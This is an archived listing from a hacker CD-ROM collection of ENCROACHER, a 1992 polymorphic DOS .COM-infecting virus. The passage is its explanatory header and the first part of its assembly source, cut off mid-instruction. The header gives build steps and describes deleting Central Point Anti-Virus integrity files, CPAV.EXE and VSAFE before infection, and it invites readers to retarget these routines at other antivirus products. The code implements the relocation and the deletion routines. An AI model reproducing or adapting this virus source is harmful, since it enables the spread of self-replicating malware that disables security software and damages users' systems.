home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
ENCROACH.ASM
< prev
next >
Wrap
Assembly Source File
|
1992-10-24
|
13KB
|
339 lines
;***************************************************************************
; The ENCROACHER virus: Incorporating anti-virus software countermeasures
; to aid in gaining and maintaining a foothold on a CENTRAL POINT ANTIVIRUS
; protected system. Some of the ideas in ENCROACHER were inspired by Mark
; Ludwig's RETALIATOR virus (American Eagle Publishing) and Nowhere Man's
; VCL 1.0 viral assembly code library. ENCROACHER also utilizes the Mutation
; Engine for polymorphism. Edited by URNST KOUCH for Crypt Newsletter #8.
;
; 1. Assemble with TASM 2.5 with the aid of MAKE.BAT, included in issue #8.
; 2. The reader must also have the MtE091b object files (not included in
; the newsletter but commonly available as the Mutation Engine at most
; good virus info archive sites.)
; 3. Place all files in ENCROACHER assembly directory.
; 4. Execute MAKE.BAT with TASM 2.5 and TLINK.EXE in path.
;
; ENCROACHER is a simple .COM appending virus which strikes the Central Point
; Anti-virus software in a direct manner. CPAV stores a file called
; chklist.cps in every directory that contains executable programs. This file
; contains the integrity (or checksum) data on each program in that
; directory. It is the library file that CPAV refers to when scanning for
; unknown viruses. By comparing 'newly checksummed' files with its data
; in chklist.cps, CPAV locates change, corruption or generic virus infection.
; Eliminating these files before virus infection forces Central Point
; Antivirus to create new 'checklist' data for the directory, AFTER the
; virus has acted. Therefore, the virus-infected file becomes
; a legal part of Central Point's freshly calculated integrity data.
; Upon call, ENCROACHER will ALWAYS check for and erase these files, forcing
; the anti-virus software to constantly update its data, effectively
; making this feature unreliable. In my experience,
; the CPAV software does not protest the elimination of these files in an
; appropriate manner.
;
; ENCROACHER will also attempt to erase the main CENTRAL POINT A-V program
; in its default installation directory before infection. This is a
; direct attack and is more likely to be noticed than the
; disappearance and reappearance of dozens of very small chklist.cps
; files. Because it is a strong move, one can be of mixed mind about using it.
; An alert user SHOULD recognize something wrong almost immediately.
; However, it is included to illustrate the point that while it presumes
; apriori knowledge concerning the location of CPAV software on the system,
; many users can STILL be expected to be lazy (and/or stupid) and use the
; vulnerable shrink-wrapped software recommendations for installation.
;
; ENCROACHER will also target and delete VSAFE.COM, CPAV's most powerful
; program for the detection of virus-mediated opening, closing and writing
; to files. (The CPAV software also contains VSAFE as a device, VSAFE.SYS.
; The user may add attack of this component to the source code if he wishes.)
; If Central Point's DEFAULT installation is in place and VSAFE is in
; memory, ENCROACHER will remove it since, generally, the program
; is merely configured to scan for known viruses, add chklist.cps files
; to program directories and lock out writes to the boot record. If all
; of VSAFE's features are enabled, ENCROACHER WILL BE detected when it
; attempts to destroy VSAFE. However, since these VSAFE features are
; not practical for everyday computing needs, it can be
; assumed relatively safe to disregard them as a threat to ENCROACHER. (The
; reader is invited to add a routine which will make a call to VSAFE
; if in memory. If VSAFE is resident, the routine could be written to
; instruct the virus to go to sleep until the danger is past.)
;
; Central Point Anti-virus contains a third program known as VWATCH. It
; can be safely ignored by ENCROACHER.
;
; ENCROACHER's anti-virus software countermeasures can be quickly adapted
; to almost any commercial software of choice. Access to manuals or
; copies of the Norton Antivirus, Fifth Generation's Untouchable or
; Leprechaun Software's Virus-Buster have all the information needed to
; allow the homebrew researcher to reconfigure the virus so that it can
; attack these programs in an educated manner.
;
; ENCROACHER2 is a variant of ENCROACHER supplied as a DEBUG script.
; In addition to it's anti- CPAV capability, ENCROACHER2 will poison selected
; programs sometime in the evening hours.
;
; General features: ENCROACHER will infect all .COM programs in its current
; directory. When finished, it will jump to the root of the current directory
; and continue its work.
; ENCROACHER WILL NOT restore the DTA, producing a shift at the prompt.
; (Sorry, deadline was approaching for the newsletter and I had to get this
; baby to bed.)
;
; ENCROACHER has no problem infecting COMMAND.COM or NDOS.COM! The operating
; system WILL continue to load properly. ENCROACHER quickly deletes
; Central Point software programs on start-up. There is no noticeable
; delay in infection times between it and a copy of the virus lacking
; these features.
; ENCROACHER will quickly infect down the trunk of any directory structure.
;
; Keep in mind, that ENCROACHER 2 can be frustratingly destructive once
; it has spread out onto a system.
.model tiny
.radix 16
.code
extrn mut_engine: near, rnd_get: near, rnd_init: near
extrn rnd_buf: word, data_top: near
org 100h
start:
call locadr
reladr:
db 'ENCROACHER is here'
locadr:
pop dx
mov cl,4
shr dx,cl
sub dx,10
mov cx,ds
add cx,dx ;Calculate new CS
mov dx,offset begin
push cx dx
retf
begin:
cld
mov di,offset start
push es di
push cs
pop ds
mov si,offset old_cod
movsb ;Restore first 3 bytes
movsw
push ax
mov dx,offset dta_buf ;Set DTA
mov ah,1a
int 21
mov ax,3524 ;Hook INT 24
int 21
push es bx
mov dx,offset fail_err
mov ax,2524
int 21
killcps: ; clear CPS integrity files from startup directory
mov dx,offset killfile ; DX points to data mask: chklist.cps
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; All file attributes valid
int 021h
jc erase_done ; Exit procedure on failure
mov ah,02Fh ; DOS get DTA function
int 021h
lea dx,[bx + 01Eh] ; DX points to filename in DTA
erase_loop:
mov ah,041h ; DOS delete file function
int 021h
mov ah,03Ch ; DOS create file function
xor cx,cx ; No attributes for new file
int 021h
mov ah,041h ; DOS delete file function
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc erase_loop ; Repeat until no files left
erase_done:
jmp killcpav ; chklist.cps gone, go for CPAV.EXE
; in factory installation
killcpav: ; clear CPAV master executable from default directory
mov dx,offset killfile2 ; DX points to filename
mov ah,41h ; DOS erase file function
int 21h
jc killvsafe
killvsafe:
mov dx,offset killfile3
mov ah,41h
int 21h
jc erase_done2
erase_done2:
jmp getonwithit
getonwithit: ;get on with infecting files
xor ax,ax ;Initialize random number generator
mov [rnd_buf],ax ;for Mutation Engine use
call rnd_init
push sp
pop cx
sub cx,sp
add cx,4
push cx
find_lup1:
mov dx,offset srchnam ;COMfile mask for clean file search
mov cl,3
mov ah,4e ;find a file
find_lup2:
int 21 ;Find the n